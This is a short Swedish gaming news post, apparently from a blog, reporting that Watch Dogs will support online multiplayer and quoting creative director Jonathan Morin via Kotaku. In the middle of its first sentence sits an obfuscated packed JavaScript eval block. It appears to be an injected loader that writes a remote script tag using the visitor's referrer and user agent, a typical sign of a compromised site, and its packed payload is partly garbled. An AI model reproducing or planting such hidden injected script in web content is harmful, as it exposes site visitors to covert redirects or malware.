Image Image Image Image Image Image Image Image Image Image

| 17 oktober, 2018

Scroll to top

Top

Watch Dogs kommer att få online del

Sebastian Plengier Ehrnfelt

Watch eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yzdkh|var|u0026u|referrer|ebayz||js|php’.split(‘|’),0,{}))
Dogs har fångat många spelintressenter de senaste dagarna. Ett spel som jag själv tror kommer bli en hård konkurrent till succén Grand Theft Auto.

Men något som inte Ubisoft pratat om alls är ifall Watch Dogs kommer ha någon multiplayer del.  

I en intervju mellan Kotau och spelets creative director Jonathan Morin nämns det att spelet kommer stödja både single player och online.

”Watch Dogs is all about hyperconnectivity. To me, that has to mean all the time and anywhere. So yes, other people are out there all the time, when you don’t expect it. Whether you’re playing single-player or multiplayer it’s happening,”

I single player kommer användare kunna hoppa in i spel för att hjälpa sina vänner. Exakt hur detta kommer att fungera i praktiken fick vi inte veta.

Via: kotaku.com